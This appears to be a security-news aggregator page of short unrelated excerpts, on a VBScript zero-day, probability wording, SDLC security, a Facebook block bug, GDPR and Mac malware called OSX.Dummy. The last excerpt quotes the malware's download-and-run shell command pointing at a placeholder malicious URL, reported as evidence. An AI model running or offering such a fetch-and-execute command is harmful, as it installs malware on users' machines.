Delving deep into VBScript

In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.

If You Say Something Is “Likely,” How Likely Do People Think It Is?

People use imprecise words to describe the chance of events all the time — “It’s likely to rain,” or “There’s a real possibility they’ll launch before us,” or “It’s doubtful the nurses will strike.” Not only are such probabilistic terms subjective, but they also can have widely different interpretations. One person’s “pretty likely” is another’s “far from certain.” Our research shows just how broad these gaps in understanding can be and the types of problems that can flow from these differences in interpretation.

What Security Lessons Can Large Enterprises Learn From Small Businesses?

Have you ever been in a situation where multiple adults are attempting to solve a problem, but a small child is the only voice of reason in the room? Children often lack a filter — and have a unique type of wisdom that can only stem from a young person’s perspective of the world. Why can’t we harness these powers for the business world?

Facebook Bug Unblocked Your Blocked Friends for a Week

Facebook has notified 800,000 users whose privacy has been compromised by a “blocked” bug. It appears that blocked individuals on Facebook and Messenger of the affected users were temporarily unblocked. Facebook also has some new API restrictions aimed at protecting user information more efficiently.

How To Secure Your SDLC The Right Way

The ever-evolving threat landscape in our ecosystem demands that we put some thought into the security controls that we use to ensure we keep the bad guys away from our data. This is where software development lifecycle (SDLC) security comes into play. Organizations need to ensure that beyond providing their customers with innovative products ahead of the competition, their security is on point every step of the way throughout the SDLC.

Science Fiction Come True: Weaponized Technology Threatens to Shatter Security, Critical Systems

By 2020, the very foundations of today’s digital world will shake. Nation states and terrorist groups will increasingly weaponize the cyber domain, launching attacks on critical national infrastructure that cause widespread destruction and chaos. With power, communications and logistics systems down, organizations will lose the basic building blocks needed for doing business. Heating, air conditioning, lighting, transport, information, communication and a safe working environment will no longer be taken for granted.

Navigating Dangerous Waters: the Maritime Industry’s New Cybersecurity Threat as Technology Innovation Grows

The rapid evolution of technology and, in particular, the Industrial Internet of Things (IIoT) is transforming critical environments, bringing benefits such as optimised processes, reduced costs and energy efficiencies. The maritime industry, which forms part of our critical infrastructure, is adapting to access many of the benefits that innovation in technology can offer. By the end of the decade, for example, a new era of shipping will have started with the world’s first autonomous container ship transporting goods around the coastline of Norway.

A bigger Amazon Prime Day 2018 arrives July 16 with more deals, devices and longer hours

Amazon’s Prime Day, the company’s annual sales event that’s now its biggest, will be held this year on July 16, starting at 12 PM PT/3 PM ET, the retailer announced today. One big change this time around is the event’s length — last year, Prime Day ran 30 hours, but this year’s event will run for 36 hours. In addition to being the longest Prime Day to date, the event will also expand to new markets this year, says Amazon.

GDPR Was Painful, But What Happens Now?

With the GDPR deadline now passed, the sigh of relief from IT departments up and down the country was almost audible. IT teams were thrown the challenge of working out what was needed to meet the GDPR guidelines as it was thought to be a security issue. It swiftly became apparent, however, that it was a people and process issue and not a technology one. So IT passed the buck on to the legal, HR and finance departments. But as companies gained a handle on the policies and procedures they needed, it quickly became apparent the IT department would be required again.

Raytheon hires Air Force CISO Peter Kim

The U.S. Air Force’s recently departed Chief Information Security Officer Peter Kim joined the military contracting giant Raytheon as its director of IT security and governance at the company’s subsidiary Raytheon Missile Systems, CyberScoop has learned.

Mac malware targets cryptomining users

Last week, a security researcher named Remco Verhoef announced the discovery of a new piece of Mac malware being distributed on cryptomining chat groups. This malware was later further analyzed by Patrick Wardle, who gave it the rather appropriate moniker OSX.Dummy.

The malware was being distributed by chat users posing as admins, who posted the following shell script for users to run:

cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script